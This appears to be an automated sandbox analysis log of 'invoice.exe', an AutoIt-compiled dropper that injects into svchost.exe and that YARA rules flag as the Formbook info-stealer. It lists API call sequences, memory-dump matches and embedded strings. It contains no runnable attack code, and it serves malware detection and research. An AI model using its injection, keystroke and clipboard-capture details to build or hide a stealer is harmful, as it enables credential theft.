            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FF407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard | 0_2_00FF407C
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FF427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 0_2_00FF427A
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FE003A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState | 0_2_00FE003A
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_0100CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW | 0_2_0100CB26

            E-Banking Fraud

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000003.00000002.3576495613.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.3575236547.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1867193556.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.3576582157.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.3576662143.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1867580811.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.3576480081.0000000002850000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1867970632.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3576495613.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3575236547.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1867193556.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3576582157.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3576662143.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1867580811.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.3576480081.0000000002850000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1867970632.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\invoice.exe | Code function: This is a third-party compiled AutoIt script. | 0_2_00F83B4C
            Source: invoice.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: invoice.exe, 00000000.00000000.1707351548.0000000001034000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_b4adfed2-6
            Source: invoice.exe, 00000000.00000000.1707351548.0000000001034000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_31bbf1df-f
            Source: invoice.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_c1aeed67-b
            Source: invoice.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_5bdf353f-e
            Source: initial sample | Static PE information: Filename: invoice.exe
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042C5B3 NtClose | 1_2_0042C5B3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972B60 NtClose,LdrInitializeThunk | 1_2_03972B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk | 1_2_03972DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972C70 NtFreeVirtualMemory,LdrInitializeThunk | 1_2_03972C70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039735C0 NtCreateMutant,LdrInitializeThunk | 1_2_039735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03974340 NtSetContextThread | 1_2_03974340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03974650 NtSuspendThread | 1_2_03974650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972B80 NtQueryInformationFile | 1_2_03972B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972BA0 NtEnumerateValueKey | 1_2_03972BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972BF0 NtAllocateVirtualMemory | 1_2_03972BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972BE0 NtQueryValueKey | 1_2_03972BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972AB0 NtWaitForSingleObject | 1_2_03972AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972AD0 NtReadFile | 1_2_03972AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972AF0 NtWriteFile | 1_2_03972AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972F90 NtProtectVirtualMemory | 1_2_03972F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972FB0 NtResumeThread | 1_2_03972FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972FA0 NtQuerySection | 1_2_03972FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972FE0 NtCreateFile | 1_2_03972FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972F30 NtCreateSection | 1_2_03972F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972F60 NtCreateProcessEx | 1_2_03972F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972E80 NtReadVirtualMemory | 1_2_03972E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972EA0 NtAdjustPrivilegesToken | 1_2_03972EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972EE0 NtQueueApcThread | 1_2_03972EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972E30 NtWriteVirtualMemory | 1_2_03972E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972DB0 NtEnumerateKey | 1_2_03972DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972DD0 NtDelayExecution | 1_2_03972DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972D10 NtMapViewOfSection | 1_2_03972D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972D00 NtSetInformationFile | 1_2_03972D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972D30 NtUnmapViewOfSection | 1_2_03972D30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972CA0 NtQueryInformationToken | 1_2_03972CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972CC0 NtQueryVirtualMemory | 1_2_03972CC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972CF0 NtOpenProcess | 1_2_03972CF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972C00 NtQueryInformationProcess | 1_2_03972C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03972C60 NtCreateKey | 1_2_03972C60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03973090 NtSetValueKey | 1_2_03973090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03973010 NtOpenDirectoryObject | 1_2_03973010
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039739B0 NtGetContextThread | 1_2_039739B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03973D10 NtOpenProcessToken | 1_2_03973D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03973D70 NtOpenThread | 1_2_03973D70
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FEA279: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle | 0_2_00FEA279
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FD8638 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock | 0_2_00FD8638
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FE5264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState | 0_2_00FE5264
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00F8E800 | 0_2_00F8E800
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FADAF5 | 0_2_00FADAF5
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00F8FE40 | 0_2_00F8FE40
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00F8E060 | 0_2_00F8E060
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00F94140 | 0_2_00F94140
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FA2345 | 0_2_00FA2345
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FB6452 | 0_2_00FB6452
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FB25AE | 0_2_00FB25AE
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_01000465 | 0_2_01000465
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FA277A | 0_2_00FA277A
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00F96841 | 0_2_00F96841
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FB69C4 | 0_2_00FB69C4
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00F98968 | 0_2_00F98968
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FE8932 | 0_2_00FE8932
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FDE928 | 0_2_00FDE928
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_010008E2 | 0_2_010008E2
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FB890F | 0_2_00FB890F
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FACCA1 | 0_2_00FACCA1
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FB6F36 | 0_2_00FB6F36
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00F970FE | 0_2_00F970FE
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00F93190 | 0_2_00F93190
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00F81287 | 0_2_00F81287
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FAF359 | 0_2_00FAF359
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FA3307 | 0_2_00FA3307
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00F95680 | 0_2_00F95680
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FA1604 | 0_2_00FA1604
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00F958C0 | 0_2_00F958C0
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FA7813 | 0_2_00FA7813
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FA1AF8 | 0_2_00FA1AF8
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FB9C35 | 0_2_00FB9C35
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_01007E0D | 0_2_01007E0D
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FABF26 | 0_2_00FABF26
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00FA1F10 | 0_2_00FA1F10
            Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_0152EBE8 | 0_2_0152EBE8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00418573 | 1_2_00418573
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040E063 | 1_2_0040E063
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004028C0 | 1_2_004028C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004028BE | 1_2_004028BE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004031E0 | 1_2_004031E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00401180 | 1_2_00401180
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004023E0 | 1_2_004023E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042EBE3 | 1_2_0042EBE3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402CF0 | 1_2_00402CF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FDC3 | 1_2_0040FDC3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004025A0 | 1_2_004025A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FDBA | 1_2_0040FDBA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041674F | 1_2_0041674F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00416753 | 1_2_00416753
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FFE3 | 1_2_0040FFE3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03A003E6 | 1_2_03A003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0394E3F0 | 1_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039FA352 | 1_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039C02C0 | 1_2_039C02C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039E0274 | 1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03A001AA | 1_2_03A001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F41A2 | 1_2_039F41A2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F81CC | 1_2_039F81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039DA118 | 1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03930100 | 1_2_03930100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039C8158 | 1_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039D2000 | 1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393C7C0 | 1_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03964750 | 1_2_03964750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03940770 | 1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0395C6E0 | 1_2_0395C6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03A00591 | 1_2_03A00591
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03940535 | 1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039EE4F6 | 1_2_039EE4F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039E4420 | 1_2_039E4420
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F2446 | 1_2_039F2446
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F6BD7 | 1_2_039F6BD7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039FAB40 | 1_2_039FAB40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393EA80 | 1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03A0A9A6 | 1_2_03A0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A01_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039569621_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039268B81_2_039268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E8F01_2_0396E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A8401_2_0394A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039428401_2_03942840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BEFA01_2_039BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932FC81_2_03932FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960F301_2_03960F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E2F301_2_039E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03982F281_2_03982F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4F401_2_039B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952E901_2_03952E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FCE931_2_039FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FEEDB1_2_039FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393AE0D1_2_0393AE0D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FEE261_2_039FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940E591_2_03940E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03958DBF1_2_03958DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DCD1F1_2_039DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AD001_2_0394AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0CB51_2_039E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930CF21_2_03930CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940C001_2_03940C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0398739A1_2_0398739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F132D1_2_039F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392D34C1_2_0392D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039452A01_2_039452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395B2C01_2_0395B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395D2F01_2_0395D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E12ED1_2_039E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394B1B01_2_0394B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0B16B1_2_03A0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392F1721_2_0392F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397516C1_2_0397516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EF0CC1_2_039EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039470C01_2_039470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F70E91_2_039F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF0E01_2_039FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF7B01_2_039FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F16CC1_2_039F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DD5B01_2_039DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F75711_2_039F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF43F1_2_039FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039314601_2_03931460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FB801_2_0395FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B5BF01_2_039B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397DBF91_2_0397DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFB761_2_039FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DDAAC1_2_039DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03985AA01_2_03985AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1AA31_2_039E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EDAC61_2_039EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFA491_2_039FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F7A461_2_039F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B3A6C1_2_039B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D59101_2_039D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039499501_2_03949950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395B9501_2_0395B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039438E01_2_039438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AD8001_2_039AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03941F921_2_03941F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFFB11_2_039FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03903FD21_2_03903FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03903FD51_2_03903FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFF091_2_039FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03949EB01_2_03949EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FDC01_2_0395FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F1D5A1_2_039F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03943D401_2_03943D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F7D731_2_039F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFCF21_2_039FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B9C321_2_039B9C32
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0392B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03975130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 039AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 039BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03987E54 appears 99 times
            Source: C:\Users\user\Desktop\invoice.exe Code function: String function: 00F87F41 appears 35 times
            Source: C:\Users\user\Desktop\invoice.exe Code function: String function: 00FA8A80 appears 42 times
            Source: C:\Users\user\Desktop\invoice.exe Code function: String function: 00FA0C63 appears 70 times
            Source: invoice.exe Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: invoice.exe, 00000000.00000003.1716154182.000000000433D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs invoice.exe
            Source: invoice.exe, 00000000.00000003.1717375076.00000000041E3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs invoice.exe
            Source: invoice.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3576495613.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
